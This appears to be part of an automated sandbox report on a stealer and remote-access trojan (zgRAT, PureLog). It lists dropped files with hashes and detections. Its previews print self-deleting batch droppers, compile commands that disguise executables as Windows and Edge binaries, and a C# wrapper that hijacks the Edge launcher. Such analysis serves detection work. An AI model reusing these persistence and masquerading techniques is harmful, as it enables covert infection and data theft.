                                                                                                                                                                                                    Entropy (8bit):5.088902214632674
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fPC4dDSqj:Hu7L//TRq79cQDRz
                                                                                                                                                                                                    MD5:8A47BBE025DA67B051E26E068AC78C42
                                                                                                                                                                                                    SHA1:C664A1D742E8FFC127CAA9A8F5C20028C4D92209
                                                                                                                                                                                                    SHA-256:9E1C2BBA2B1BBD3D492395E73E841872ACE67A4E2FB5FAE80C1F4AA8DF05CDF1
                                                                                                                                                                                                    SHA-512:FBBAE0043BC76FD3755F3695FBCAA1FAC0B9BBFB7D5B930D01DD7E8072709BA097A5F79739A04335247C4179F81FF826453A3F183501205EB7DD9D33A56E42D2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.0.cs"
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (315), with CRLF, CR line terminators
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):736
                                                                                                                                                                                                    Entropy (8bit):5.271527824478237
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:apI/u7L//TRq79cQDRSKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDUKax5DqBVKVrdFAMBJj
                                                                                                                                                                                                    MD5:AFED471502819823F627210F9E3C2F61
                                                                                                                                                                                                    SHA1:F487300AFD744E554E3B008B681F5346643591A0
                                                                                                                                                                                                    SHA-256:CFC77F37D42A60943A2B7928E25F5BA317509E021C49D1011924B063826C48D2
                                                                                                                                                                                                    SHA-512:E0F61C8E3B0CE00BB583B4DA3B0570F84C1D6D39A9304ADD13FC23712B1228D09433AA165FB5CD483F5F941A13E7DAE7B2815F647CB32A7B38967CE9F7356C61
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):233
                                                                                                                                                                                                    Entropy (8bit):5.231458084830135
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:hCijTg3Nou1SV+DE1CHhJ23S8uoIKOZG1CHhJ23f4Eh:HTg9uYDEzdP3
                                                                                                                                                                                                    MD5:FAD0A5AA088779BB3FAA7A182F2D4E24
                                                                                                                                                                                                    SHA1:0FEB64C701B463262B40DAC813890B4E327A8C8A
                                                                                                                                                                                                    SHA-256:334EB844C9CD50B5C0BFC1D4FA2A36E276FA8059BE47081B72F8EE43C453ACC0
                                                                                                                                                                                                    SHA-512:35E920848AB2C5D2DDAFBA099B56D93842805D78FC15E14471189358AEBA37598EAF9D88DA570CEF0DB06B30525D447CE3182AB0E79FF1AD92D32C619F659FFC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qFKlxXtZuP.bat"
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                    Entropy (8bit):5.097044396370329
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLyd3iFkD:JNVQIbSfhWLzIiFkMSfh+kFkD
                                                                                                                                                                                                    MD5:33AC1F5F23562A665713E3860D9CAD15
                                                                                                                                                                                                    SHA1:2EBA853B8F2220982E047EF2FF6B0F7780E4E8FB
                                                                                                                                                                                                    SHA-256:0BB287A30179636637E11CE75F4D2A664D7FA8DDB7C9325CAAAD0D042F544AF7
                                                                                                                                                                                                    SHA-512:1172BDF3FC42E5980A8F0D54EDE5AEE14E9DFB29A2178C2B4882F78D7382BEA05600DF5E871CDAF68651AA49027BDF7A6C78BAEC69CD33037A8EF59BE763663D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                                                    Entropy (8bit):5.124117635692048
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23f2zIzP:Hu7L//TRRzscQDOzIzP
                                                                                                                                                                                                    MD5:0A37440EE93088935BA379626DFC2018
                                                                                                                                                                                                    SHA1:6C3A20D616FCF50AEC56AEE0D0018CC50AAE7F0B
                                                                                                                                                                                                    SHA-256:F84A178352ED11B601678A4BDECFF3793CB8F6EE27364703F681F8989773D4FC
                                                                                                                                                                                                    SHA-512:4E2F9C873D9DD22D33F0B2C0BAED63D4F0C75F9560C31C46B2E44D79EBBCA30B31D0EF6FF0A1CAC0C95D85D0F26687C4FA69F803F8A166F1B9EF31D5F1DD85F5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.0.cs"
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (330), with CRLF, CR line terminators
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):751
                                                                                                                                                                                                    Entropy (8bit):5.248692046841666
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:apI/u7L//TRRzscQDOzIz2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDO8aKax5DqBVKVrdFAMb
                                                                                                                                                                                                    MD5:9B82ADFF87EA91A87668053913FAAAF1
                                                                                                                                                                                                    SHA1:803AB5D1F8B1D347CF38A75B8084E621418344E6
                                                                                                                                                                                                    SHA-256:AE57C0D134A86D0E300A89240AE28197B3B838FA3E969A8CAAB4AA344101942C
                                                                                                                                                                                                    SHA-512:A5CCC34823ACDF49C4C76446054599A9DE5B458BCF8A3DBCE88BA69D27DA06F7D083D8A741B3D950180156BC7C73FAD1E3C8142CFD190432D508D72141C2C4D5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                    Entropy (8bit):4.263465189601646
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:WXcByLzN4jT:WEyLOH
                                                                                                                                                                                                    MD5:A376ADAA36B6B6FA0617A8D71C0C8318
                                                                                                                                                                                                    SHA1:D0322D047202B19C16D63F930F8A764A767E1E7C
                                                                                                                                                                                                    SHA-256:3DB88BF07DCAB0548594FBAF9D48BD6EC3CC9E7A4A6CF8D2709F7494BB2C4235
                                                                                                                                                                                                    SHA-512:6E9528D049EF7B7566368FAD6F55B91C6B8D470894FFB112594F888316583A42D530508FE0F92EB4EC232F9DF97021D1922919FD53F9DBFE2C6AB1DEFC1F2F4C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:irryZAEUfpr62VhNI9tSLXffj
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):195
                                                                                                                                                                                                    Entropy (8bit):5.1238032051570235
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:hCijTg3Nou1SV+DE74vKOZG1CHhJ23f9be:HTg9uYDEVFbe
                                                                                                                                                                                                    MD5:C4F8ECE9810B475694C5C1F2AD666977
                                                                                                                                                                                                    SHA1:0A49A01E4A3A9D5D5ABC94E53C3CADA158BB3F98
                                                                                                                                                                                                    SHA-256:259E174700E10C5F69E48ECC7437820980BC53EE40FE2CF1B46DE53C212FEC81
                                                                                                                                                                                                    SHA-512:EDC4DBB0E21AA268FB4FC92D021CBA4B1127296791022D58940156574AC58A44752608C6120A9D979EDC41EBF5938A4974564FF3AF87E0FC58C11BA6405A80D4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zugvBzMsRZ.bat"
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1963008
                                                                                                                                                                                                    Entropy (8bit):7.552676792704024
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                                                    MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                                                    SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                                                    SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: gh3zRWl4or.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: seoI30IZZr.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: 7NrGfIpGYi.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: mqJJr1R3v4.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Cr4745ElZg.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: gh3zRWl4or.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: seoI30IZZr.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: p3f932IsTO.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: UpU2O6YQxG.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23552
                                                                                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23552
                                                                                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32256
                                                                                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
